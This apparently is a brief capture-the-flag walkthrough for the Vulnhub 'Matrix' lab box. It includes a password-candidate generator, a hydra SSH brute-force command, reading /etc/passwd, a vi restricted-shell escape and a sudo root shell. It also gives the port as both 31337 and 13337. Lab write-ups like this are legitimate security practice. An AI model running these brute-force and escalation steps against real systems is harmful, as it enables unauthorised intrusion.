Matrix

Matrix is a medium level boot2root challenge.

nmap scan of the matrix box reveals port(s) : 80, 31337

gobuster reveals nothing In the source code of ip:13337 there's a comment

// in code
<!--p class="service__text">ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=</p-->
								</div><!-- End / service -->
							
								
							</div>
						</div>

base64 decoding it

downloading the Cypher.matrix

Cipher identified using

identified it as brainf*ck decoding it using

El Brainfuckcopy.sh

it mentions username of guest and password have to be constructed:

// possible combinations 
#!/usr/bin/env python
chars="ABCDEFIGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"

for a in chars:
  for b in chars:
    print 'k1ll0r' + a + b

// brute force ssh 
hydra -l guest -P final.txt 192.168.1.135 ssh -t 64

/usr/bin/cat /etc/passwd

// escape out of restricted shell


update PATH and ENV
As vi lets you run commands, that looked like a possible escape, and it worked 
as expected, giving me a bash shell. 
Set the PATH and SHELL environment variables,
ready to search for privilege escalation possibilities.
sudo -l 
reveals you can execute any cmd 

All you got to do :
sudo /bin/bash

and you root
cat /root/flag.txt

Proof

PreviousVulnhub NextAragog

Last updated 2 years ago